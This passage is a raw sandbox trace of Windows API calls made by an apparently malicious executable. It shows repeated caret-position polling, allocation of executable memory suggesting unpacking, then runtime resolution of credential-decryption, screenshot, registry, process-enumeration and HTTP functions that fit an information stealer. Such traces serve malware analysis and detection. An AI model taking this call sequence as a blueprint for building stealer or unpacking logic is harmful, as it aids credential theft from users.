| out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.818] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0046.819] GetCaretPos (in: lpPoint=0x18fd48 | out: lpPoint=0x18fd48) returned 1 [0047.238] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0047.238] GetProcAddress (hModule=0x76c20000, lpProcName="LocalAlloc") returned 0x76c3168c [0047.239] LocalAlloc (uFlags=0x0, uBytes=0x56ba8) returned 0x2b4008 [0047.243] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0047.244] VirtualProtect (in: lpAddress=0x2b4008, dwSize=0x56ba8, flNewProtect=0x40, lpflOldProtect=0x18fd4c | out: lpflOldProtect=0x18fd4c*=0x4) returned 1 [0047.302] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0047.302] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0047.302] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0047.302] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0047.302] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0047.302] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0047.302] GetProcAddress (hModule=0x76c20000, lpProcName="Module32First") returned 0x76cb5cd9 [0047.302] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0047.303] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0047.304] Module32First (hSnapshot=0x58, lpme=0x18ede0) returned 1 [0047.307] VirtualAlloc (lpAddress=0x0, dwSize=0x8aa50, flAllocationType=0x1000, flProtect=0x40) returned 0x1d10000 [0047.323] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0047.323] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76c20000 [0047.323] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0047.323] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0047.323] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0047.323] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0047.324] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0047.324] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0047.324] GetProcAddress (hModule=0x76c20000, lpProcName="SetErrorMode") returned 0x76c31b00 [0047.324] SetErrorMode (uMode=0x400) returned 0x0 [0047.324] SetErrorMode (uMode=0x0) returned 0x400 [0047.324] GetVersionExA (in: lpVersionInformation=0x18dd10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}\x16w") | out: lpVersionInformation=0x18dd10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0047.324] VirtualAlloc (lpAddress=0x0, dwSize=0x89c00, flAllocationType=0x1000, flProtect=0x4) returned 0x1da0000 [0047.332] VirtualProtect (in: lpAddress=0x400000, dwSize=0x8f000, flNewProtect=0x40, lpflOldProtect=0x18ed98 | out: lpflOldProtect=0x18ed98*=0x2) returned 1 [0047.515] VirtualFree (lpAddress=0x1da0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.518] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76c20000 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="SetCurrentDirectoryA") returned 0x76c41834 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryA") returned 0x76c5d526 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSize") returned 0x76c3196e [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0047.518] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="GetPrivateProfileSectionNamesA") returned 0x76caa1c9 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesW") returned 0x76c31b18 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSection") returned 0x77162c42 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedCompareExchange") returned 0x76c31484 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="AreFileApisANSI") returned 0x76cb40d1 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="UnlockFile") returned 0x76c5cf36 [0047.519] GetProcAddress (hModule=0x76c20000, lpProcName="LockFile") returned 0x76c5cf1e [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="LockFileEx") returned 0x76c5d57c [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="UnlockFileEx") returned 0x76c5d594 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesA") returned 0x76c35414 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesExW") returned 0x76c34574 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTime") returned 0x76c35a96 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="UnmapViewOfFile") returned 0x76c31826 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempPathA") returned 0x76c5276c [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempPathW") returned 0x76c4d4dc [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="FormatMessageW") returned 0x76c34620 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetFullPathNameA") returned 0x76c3e2c1 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetFullPathNameW") returned 0x76c340d4 [0047.520] GetProcAddress (hModule=0x76c20000, lpProcName="GetDiskFreeSpaceA") returned 0x76cb433f [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetDiskFreeSpaceW") returned 0x76c4f7aa [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemInfo") returned 0x76c349ca [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="MapViewOfFile") returned 0x76c318f1 [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileMappingA") returned 0x76c35506 [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetComputerNameA") returned 0x76c4b6e0 [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalMemoryStatus") returned 0x76c38b6d [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLocaleName") returned 0x76cb47c1 [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="TzSpecificLocalTimeToSystemTime") returned 0x76c5066a [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetTimeZoneInformation") returned 0x76c3465a [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoA") returned 0x76c4d5e5 [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="FileTimeToSystemTime") returned 0x76c3542c [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileInformationByHandle") returned 0x76c353ae [0047.521] GetProcAddress (hModule=0x76c20000, lpProcName="SystemTimeToFileTime") returned 0x76c35a7e [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocalTime") returned 0x76c35aa6 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocale") returned 0x76c4ce46 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesA") returned 0x76c5287b [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLCID") returned 0x76c33da5 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoW") returned 0x76c33c42 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDriveStringsA") returned 0x76c3e4dc [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeA") returned 0x76c4ef75 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryW") returned 0x76c34259 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileW") returned 0x76c5830d [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatW") returned 0x76c5828e [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0047.522] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpW") returned 0x76c35929 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="SetEnvironmentVariableA") returned 0x76c3e331 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="SetEnvironmentVariableW") returned 0x76c389f1 [0047.523] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="LocalFree") returned 0x76c32d3c [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="LocalAlloc") returned 0x76c3168c [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="FormatMessageA") returned 0x76c55fbd [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="HeapCreate") returned 0x76c34a2d [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleCount") returned 0x76c3cb29 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0047.524] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSetInformation") returned 0x76c35651 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0047.525] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0047.526] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0047.526] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedIncrement") returned 0x76c31400 [0047.526] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedDecrement") returned 0x76c313f0 [0047.526] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedExchange") returned 0x76c31462 [0047.526] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0047.526] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0047.526] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="GetDesktopWindow") returned 0x74f60a19 [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="GetSystemMetrics") returned 0x74f57d2f [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="GetDC") returned 0x74f572c4 [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="CharToOemA") returned 0x74f64fee [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="EnumDisplayDevicesW") returned 0x74f7e567 [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxA") returned 0x74fafd1e [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="GetKeyboardLayoutList") returned 0x74f62e69 [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0047.526] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseDC") returned 0x74f57446 [0047.526] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0047.527] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateCompatibleBitmap") returned 0x75ae5f49 [0047.527] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectObject") returned 0x75ae4f70 [0047.527] GetProcAddress (hModule=0x75ad0000, lpProcName="BitBlt") returned 0x75ae5ea6 [0047.527] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0047.527] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateDCA") returned 0x75ae7bcc [0047.527] GetProcAddress (hModule=0x75ad0000, lpProcName="GetDeviceCaps") returned 0x75ae4de0 [0047.527] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateCompatibleDC") returned 0x75ae54f4 [0047.527] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0047.527] GetProcAddress (hModule=0x74d40000, lpProcName="RegGetValueW") returned 0x74d50e47 [0047.527] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExA") returned 0x74d54907 [0047.527] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExA") returned 0x74d548ef [0047.527] GetProcAddress (hModule=0x74d40000, lpProcName="GetUserNameA") returned 0x74d6a4b4 [0047.527] GetProcAddress (hModule=0x74d40000, lpProcName="GetCurrentHwProfileA") returned 0x74d811f8 [0047.527] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0047.528] GetProcAddress (hModule=0x74d40000, lpProcName="RegEnumValueA") returned 0x74d4cf49 [0047.528] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0047.528] GetProcAddress (hModule=0x74d40000, lpProcName="RegGetValueA") returned 0x74d4a9dd [0047.528] GetProcAddress (hModule=0x74d40000, lpProcName="RegEnumKeyExA") returned 0x74d51481 [0047.528] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0047.531] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteA") returned 0x76217078 [0047.531] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathA") returned 0x760e7804 [0047.531] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x755e0000 [0047.533] GetProcAddress (hModule=0x755e0000, lpProcName="CoCreateInstance") returned 0x75629d0b [0047.533] GetProcAddress (hModule=0x755e0000, lpProcName="CoUninitialize") returned 0x756286d3 [0047.533] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0047.533] GetProcAddress (hModule=0x75340000, lpProcName="PathMatchSpecW") returned 0x753586f7 [0047.533] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0047.536] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0047.536] GetProcAddress (hModule=0x759b0000, lpProcName="CryptUnprotectData") returned 0x759e5a7f [0047.536] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75140000 [0047.537] GetProcAddress (hModule=0x75140000, lpProcName="GetModuleFileNameExA") returned 0x751415bc [0047.537] GetProcAddress (hModule=0x75140000, lpProcName="GetModuleBaseNameA") returned 0x751415a4 [0047.537] GetProcAddress (hModule=0x75140000, lpProcName="EnumProcessModules") returned 0x75141408 [0047.537] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x753d0000 [0047.542] GetProcAddress (hModule=0x753d0000, lpProcName="HttpQueryInfoA") returned 0x753ea33e [0047.542] GetProcAddress (hModule=0x753d0000, lpProcName="InternetSetOptionA") returned 0x753e75e8 [0047.542] GetProcAddress (hModule=0x753d0000, lpProcName="InternetConnectA") returned 0x753f49e9 [0047.543] GetProcAddress (hModule=0x753d0000, lpProcName="InternetReadFile") returned 0x753eb406 [0047.543] GetProcAddress (hModule=0x753d0000, lpProcName="HttpOpenRequestA") returned 0x753f4c7d [0047.543] GetProcAddress (hModule=0x753d0000, lpProcName="HttpSendRequestA") returned 0x754618f8 [0047.543] GetProcAddress (hModule=0x753d0000, lpProcName="InternetCloseHandle") returned 0x753eab49 [0047.543] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenUrlA") returned 0x754130f1 [0047.543] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenA") returned 0x753ff18e [0047.543] GetProcAddress (hModule=0x753d0000, lpProcName="HttpAddRequestHeadersA") returned 0x753edcd2 [0047.543] GetProcAddress (hModule=0x753d0000, lpProcName="InternetSetFilePointer") returned 0x7544af16 [0047.543] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x73d30000 [0047.907] GetProcAddress (hModule=0x73d30000, lpProcName="GdiplusStartup") returned 0x73d55600 [0047.907] GetProcAddress (hModule=0x73d30000, lpProcName="GdiplusShutdown") returned 0x73d556be [0047.907] GetProcAddress (hModule=0x73d30000, lpProcName="GdipGetImageEncodersSize") returned 0x73d72203 [0047.907] GetProcAddress (hModule=0x73d30000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x73d66671 [0047.907] GetProcAddress (hModule=0x73d30000, lpProcName="GdipCloneImage") returned 0x73d64bfa [0047.907] GetProcAddress (hModule=0x73d30000, lpProcName="GdipSaveImageToFile") returned 0x73d641fd [0047.907] GetProcAddress (hModule=0x73d30000, lpProcName="GdipFree") returned 0x73d724b2 [0047.907] GetProcAddress (hModule=0x73d30000, lpProcName="GdipAlloc") returned 0x73d72437 [0047.908] GetProcAddress (hModule=0x73d30000, lpProcName="GdipGetImageEncoders") returned 0x73d7228c [0047.908] GetProcAddress (hModule=0x73d30000, lpProcName="GdipDisposeImage") returned 0x73d64cc8 [0047.908] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x749c0000 [0047.911] GetProcAddress (hModule=0x749c0000, lpProcName="atexit") returned 0x749dc544 [0047.911] atexit (param_1=0x1d10920) returned 0 [0047.916] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18edac | out: lpSystemTimeAsFileTime=0x18edac*(dwLowDateTime=0x1ab98ed0, 